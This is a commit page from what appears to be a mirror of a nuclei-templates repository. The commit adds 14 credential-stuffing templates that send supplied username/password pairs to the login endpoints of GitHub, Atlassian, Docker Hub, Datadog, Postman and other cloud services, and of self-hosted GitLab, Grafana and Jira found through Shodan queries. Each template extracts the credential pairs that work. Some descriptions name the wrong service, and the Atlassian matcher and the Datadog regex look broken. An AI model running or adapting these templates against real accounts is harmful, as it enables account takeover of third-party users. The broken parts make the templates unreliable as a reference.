daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

added cred template

patch-10
Parth 2023-05-08 22:35:04 +05:30
parent 33d6dcc28c
commit 6bbd3a0936
14 changed files with 677 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

55
http/credential-stuffing/cloud/atechmedia-codebase.yaml Normal file
View File

@ -0,0 +1,55 @@
id: atechmedia-codebase-login-check
info:
name: Atechmedia/Codebase Login Check
author: parthmalhotra, pdresearch
severity: critical
description: Checks for a valid Atechmedia/Codebase account.
reference:
- https://owasp.org/www-community/attacks/Credential_stuffing
tags: login-check,atechmedia,codebase,creds-stuffing
self-contained: true
requests:
- raw:
- |
GET https://identity.atechmedia.com/login HTTP/1.1
Host: identity.atechmedia.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Referer: https://identity.atechmedia.com/login
- |
POST https://identity.atechmedia.com/login HTTP/1.1
Host: identity.atechmedia.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Origin: https://identity.atechmedia.com
Content-Type: application/x-www-form-urlencoded
Referer: https://identity.atechmedia.com/login
Connection: close
utf8=%E2%9C%93&authenticity_token={{url_encode(authenticity_token)}}&username={{username}}&password={{password}}&commit=Login
cookie-reuse: true
extractors:
- type: xpath
name: authenticity_token
part: body
attribute: value
internal: true
xpath:
- /html/body/div/div[2]/div/form/input[2]
- type: dsl
dsl:
- username
- password
matchers-condition: and
matchers:
- type: word
part: header
words:
- 'Set-Cookie: user_session'
- type: status
status:
- 302

38
http/credential-stuffing/cloud/atlassian.yaml Normal file
View File

@ -0,0 +1,38 @@
id: atlassian-login-check
info:
name: Atlassian Login Check
author: parthmalhotra, pdresearch
severity: critical
description: Checks for a valid atlassian account.
reference:
- https://owasp.org/www-community/attacks/Credential_stuffing
tags: login-check,atlassian,creds-stuffing
self-contained: true
requests:
- raw:
- |-
POST https://auth.atlassian.com/co/authenticate HTTP/1.1
Host: auth.atlassian.com
Content-Type: application/json
Origin: https://id.atlassian.com
Referer: https://id.atlassian.com/
Connection: close
{"username":"{{username}}","password":"{{password}}","state":{"csrfToken":"{{rand_text_alpha(10, "")}}"}}
extractors:
- type: dsl
dsl:
- username
- password
attack: pitchfork
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"error_description":"Wrong email or password."'
- type: status
status:
- 403

37
http/credential-stuffing/cloud/avnil-pdf-generator.yaml Normal file
View File

@ -0,0 +1,37 @@
id: avnil-pdf-generator-check
info:
name: useanvil.com Login Check
author: parthmalhotra, pdresearch
severity: critical
description: Checks for a valid avnil pdf generator account.
reference:
- https://owasp.org/www-community/attacks/Credential_stuffing
tags: login-check,avnil-pdf,creds-stuffing
self-contained: true
requests:
- raw:
- |-
POST https://graphql.useanvil.com/ HTTP/1.1
Host: graphql.useanvil.com
Content-Length: 367
Content-Type: application/json
{"operationName":"LoginMutation","variables":{"email":"{{username}}","password":"{{password}}"},"query":"mutation LoginMutation($email: String, $password: String) {\n login(email: $email, password: $password) {\n eid\n firstName\n lastName\n email\n preferences {\n require2FA\n __typename\n }\n extra\n __typename\n }\n}\n"}
extractors:
- type: dsl
dsl:
- username
- password
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"email":"'
- '"eid":"'
- type: status
status:
- 200

32
http/credential-stuffing/cloud/chefapi.yaml Normal file
View File

@ -0,0 +1,32 @@
id: chefio-login-check
info:
name: Chef.io Login Check
author: parthmalhotra, pdresearch
severity: critical
description: Checks for a valid chef.io account.
reference:
- https://owasp.org/www-community/attacks/Credential_stuffing
tags: login-check,chefio,creds-stuffing
self-contained: true
requests:
- raw:
- |-
POST https://api.chef.io/login HTTP/1.1
Host: api.chef.io
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Content-Length: 160
utf8=%E2%9C%93&authenticity_token=&authenticity_token=&to=https://api.chef.io/login-success&username={{username}}&password={{password}}&commit=Sign+In
matchers-condition: and
matchers:
- type: word
part: header
words:
- 'Location: https://api.chef.io/login-success'
- type: status
status:
- 302

46
http/credential-stuffing/cloud/codepen.yaml Normal file
View File

@ -0,0 +1,46 @@
id: codepen-login-check
info:
name: codepen.io Login Check
author: parthmalhotra, pdresearch
severity: critical
description: Checks for a valid codepen account.
reference:
- https://owasp.org/www-community/attacks/Credential_stuffing
tags: login-check,codepen,creds-stuffing
self-contained: true
requests:
- raw:
- |
GET https://codepen.io/login HTTP/1.1
Host: codepen.io
- |
POST https://codepen.io/login/login HTTP/1.1
Host: codepen.io
Content-Type: application/x-www-form-urlencoded
X-CSRF-Token: {{token}}
authenticity_token={{token}}&email={{username}}&password={{password}}&login-type=fullpage
extractors:
- type: dsl
dsl:
- username
- password
- type: xpath
part: body
xpath:
- '//input[@name="authenticity_token"]/@value'
name: token
internal: true
matchers-condition: and
matchers:
- type: word
part: body
negative: true
words:
- 'The username or password you entered is incorrect, please try again.'
- type: status
status:
- 302

52
http/credential-stuffing/cloud/datadog.yaml Normal file
View File

@ -0,0 +1,52 @@
id: datadog-login-check
info:
name: Datadog Login Check
author: parthmalhotra, pdresearch
severity: critical
description: Checks for a valid datadog account.
reference:
- https://owasp.org/www-community/attacks/Credential_stuffing
tags: login-check,datadog,creds-stuffing
self-contained: true
requests:
- raw:
- |
GET https://app.datadoghq.com/account/login HTTP/1.1
Host: app.datadoghq.com
- |
POST https://app.datadoghq.com/account/login? HTTP/1.1
Host: app.datadoghq.com
Content-Type: application/x-www-form-urlencoded
_authentication_token={{auth_token}}&username={{username}}&password={{password}}
cookie-reuse: true
extractors:
- type: regex
name: auth_token
part: body
internal: true
group: 1
regex:
- "authentication_token": "(.*?)","
- type: dsl
dsl:
- username
- password
attack: pitchfork
matchers-condition: and
matchers:
- type: word
part: header
words:
- 'Set-Cookie: dogweb='
- type: status
status:
- 302

49
http/credential-stuffing/cloud/docker-hub.yaml Normal file
View File

@ -0,0 +1,49 @@
id: docker-hub-login-check
info:
name: Docker Hub Login Check
author: parthmalhotra, pdresearch
severity: critical
description: Checks for a valid atlassian account.
reference:
- https://owasp.org/www-community/attacks/Credential_stuffing
tags: login-check,docker,creds-stuffing
self-contained: true
requests:
- raw:
- |-
POST https://hub.docker.com/v2/users/login HTTP/1.1
Host: hub.docker.com
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.95 Safari/537.36
Connection: close
Content-Type: application/json
{
"username": "{{username}}",
"password": "{{password}}"
}
threads: 30
attack: pitchfork
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'token'
- type: word
part: header
words:
- 'Set-Cookie: token='
- type: status
status:
- 200
extractors:
- type: dsl
dsl:
- username
- password

36
http/credential-stuffing/cloud/gitea.yaml Normal file
View File

@ -0,0 +1,36 @@
id: gitea-login-check
info:
name: gitea.com Login Check
author: parthmalhotra, pdresearch
severity: critical
description: Checks for a valid gitea account.
reference:
- https://owasp.org/www-community/attacks/Credential_stuffing
tags: login-check,gitea,creds-stuffing
self-contained: true
requests:
- raw:
- |-
POST https://gitea.com/user/login HTTP/1.1
Host: gitea.com
Content-Type: application/x-www-form-urlencoded
user_name={{username}}&password={{password}}
extractors:
- type: dsl
dsl:
- username
- password
matchers-condition: and
matchers:
- type: word
part: header
words:
- 'Location: /'
- type: status
status:
- 303

70
http/credential-stuffing/cloud/github.yaml Normal file
View File

@ -0,0 +1,70 @@
id: github-login-check
info:
name: Github Login Check
author: parthmalhotra, pdresearch
severity: critical
description: Checks for a valid github account.
reference:
- https://owasp.org/www-community/attacks/Credential_stuffing
tags: login-check,github,creds-stuffing
self-contained: true
requests:
- raw:
- |
GET https://github.com/login HTTP/1.1
Host: github.com
- |
POST https://github.com/session HTTP/1.1
Host: github.com
Origin: https://github.com
Content-Type: application/x-www-form-urlencoded
Referer: https://github.com/login
commit=Sign+in&authenticity_token={{authenticity_token}}&login={{username}}&password={{password}}&trusted_device=&webauthn-support=supported&webauthn-iuvpaa-support=unsupported&return_to=https%3A%2F%2Fgithub.com%2Flogin&allow_signup=&client_id=&integration=&required_field_34b7=&timestamp={{timestamp}}&timestamp_secret={{timestamp_secret}}
cookie-reuse: true
extractors:
- type: xpath
name: authenticity_token
part: body
attribute: value
internal: true
xpath:
- /html/body/div[3]/main/div/div[4]/form/input[1]
- type: xpath
name: timestamp
part: body
attribute: value
internal: true
xpath:
- /html/body/div[3]/main/div/div[4]/form/div/input[10]
- type: xpath
name: timestamp_secret
part: body
attribute: value
internal: true
xpath:
- /html/body/div[3]/main/div/div[4]/form/div/input[11]
- type: dsl
dsl:
- username
- password
matchers-condition: or
matchers:
- type: dsl
name: 2fa
dsl:
- "contains(location, 'https://github.com/sessions/two-factor')"
- "status_code==302"
condition: and
- type: dsl
dsl:
- "contains(to_lower(header), 'set-cookie: logged_in=yes')"
- "contains(to_lower(header), 'set-cookie: user_session=')"
- "status_code==302"
condition: and

52
http/credential-stuffing/cloud/postman.yaml Normal file
View File

@ -0,0 +1,52 @@
id: postman-login-check
info:
name: Postman Login Check
author: parthmalhotra, pdresearch
severity: critical
description: Checks for a valid postman account.
reference:
- https://owasp.org/www-community/attacks/Credential_stuffing
tags: login-check,postman,creds-stuffing
self-contained: true
requests:
- raw:
- |
GET https://identity.getpostman.com/login HTTP/1.1
Host: identity.getpostman.com
Referer: https://identity.getpostman.com/accounts
- |
POST https://identity.getpostman.com/login HTTP/1.1
Host: identity.getpostman.com
Content-Type: application/json;charset=UTF-8
X-Csrf-Token: {{csrfToken}}
Origin: https://identity.getpostman.com
Referer: https://identity.getpostman.com/login
{"username":"{{username}}","password":"{{password}}"}
cookie-reuse: true
attack: pitchfork
extractors:
- type: xpath
name: csrfToken
part: body
attribute: value
internal: true
xpath:
- /html/body/div/div/div[1]/form/input
- type: dsl
dsl:
- username
- password
matchers-condition: and
matchers:
- type: dsl
dsl:
- "contains(to_lower(header), 'set-cookie: getpostmanlogin=yes')"
- "contains(to_lower(body), 'identity.postman.co/continue')"
- "status_code==200"
condition: and

43
http/credential-stuffing/cloud/pulmi.yaml Normal file
View File

@ -0,0 +1,43 @@
id: pulmi-login-check
info:
name: pulmi.com Login Check
author: parthmalhotra, pdresearch
severity: critical
description: Checks for a valid github account.
reference:
- https://owasp.org/www-community/attacks/Credential_stuffing
tags: login-check,pulmi,creds-stuffing
self-contained: true
requests:
- raw:
- |-
POST https://api.pulumi.com/api/console/email/login HTTP/1.1
Host: api.pulumi.com
Content-Length: 48
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/json
Origin: https://app.pulumi.com
Referer: https://app.pulumi.com/
Connection: close
{"emailOrLogin":"{{username}}","password":"{{password}}"}
extractors:
- type: dsl
dsl:
- username
- password
matchers-condition: and
matchers:
- type: word
part: body
words:
- pulumiAccessToken
- userInfo
- type: status
status:
- 200

66
http/credential-stuffing/self-hosted/gitlab.yaml Normal file
View File

@ -0,0 +1,66 @@
id: gitlab-login-check-self-hosted
info:
name: Gitlab Login Check Self Hosted
author: parthmalhotra, pdresearch
severity: critical
description: Checks for a valid login on self hosted Grafana instance.
reference:
- https://owasp.org/www-community/attacks/Credential_stuffing
metadata:
shodan-query: product:"GitLab Self-Managed"
fofa-query: product="GitLab"
tags: login-check,gitlab,creds-stuffing,self-hosted
variables:
username: "{{username}}"
password: "{{password}}"
http:
- raw:
- |
GET /users/sign_in HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept-Language: en-US,en;q=0.9,de;q=0.8
Connection: close
- |
POST /users/sign_in HTTP/1.1
Host: {{Hostname}}
Content-Length: 186
Cache-Control: max-age=0
Origin: http://{{Hostname}}
DNT: 1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Referer: http://{{Hostname}}/users/sign_in
Accept-Language: en-US,en;q=0.9,de;q=0.8
Connection: close
authenticity_token={{url_encode(authenticity_token)}}&user%5Blogin%5D={{username}}&user%5Bpassword%5D={{password}}&user%5Bremember_me%5D=0
cookie-reuse: true
attack: pitchfork
extractors:
- type: regex
part: body
internal: true
name: authenticity_token
group: 1
regex:
- '"/users/sign_in".*?authenticity_token"\s+value="([^"]+)"'
- type: dsl
dsl:
- username
- password
matchers-condition: and
req-condition: true
matchers:
- type: dsl
dsl:
- status_code_2 == 302
- '!contains(to_lower(body_2), "invalid login")'
condition: and

56
http/credential-stuffing/self-hosted/grafana.yaml Normal file
View File

@ -0,0 +1,56 @@
id: grafana-login-check
info:
name: Grafana Login Check
author: parthmalhotra, pdresearch
severity: critical
description: Checks for a valid login on self hosted Grafana instance.
reference:
- https://owasp.org/www-community/attacks/Credential_stuffing
metadata:
shodan-query: title:"Grafana"
fofa-query: title="Grafana"
tags: login-check,grafana,creds-stuffing,self-hosted
variables:
username: "{{username}}"
password: "{{password}}"
requests:
- raw:
- |-
POST /login HTTP/1.1
Host: {{Hostname}}
accept: application/json, text/plain, */*
DNT: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
content-type: application/json
Origin: {{BaseURL}}
Referer: {{BaseURL}}/login
Accept-Language: en-US,en;q=0.9,de;q=0.8
Cookie: redirect_to=%2F
Connection: close
{"user":"{{username}}","password":"{{password}}"}
extractors:
- type: dsl
dsl:
- username
- password
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Logged in'
- type: word
part: header
words:
- 'grafana_session'
- type: status
status:
- 200

45
http/credential-stuffing/self-hosted/jira.yaml Normal file
View File

@ -0,0 +1,45 @@
id: jira-login-check
info:
name: Jira Login Check
author: parthmalhotra, pdresearch
severity: critical
description: Checks for a valid login on self hosted Jira instance.
reference:
- https://owasp.org/www-community/attacks/Credential_stuffing
metadata:
shodan-query: http.component:"Atlassian Jira"
fofa-query: product="JIRA"
tags: login-check,jira,creds-stuffing,self-hosted
variables:
username: "{{username}}"
password: "{{password}}"
requests:
- raw:
- |-
POST /rest/gadget/1.0/login HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: close
os_username={{username}}&os_password={{password}}
extractors:
- type: dsl
dsl:
- username
- password
attack: pitchfork
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"loginSucceeded":true'
- type: status
status:
- 200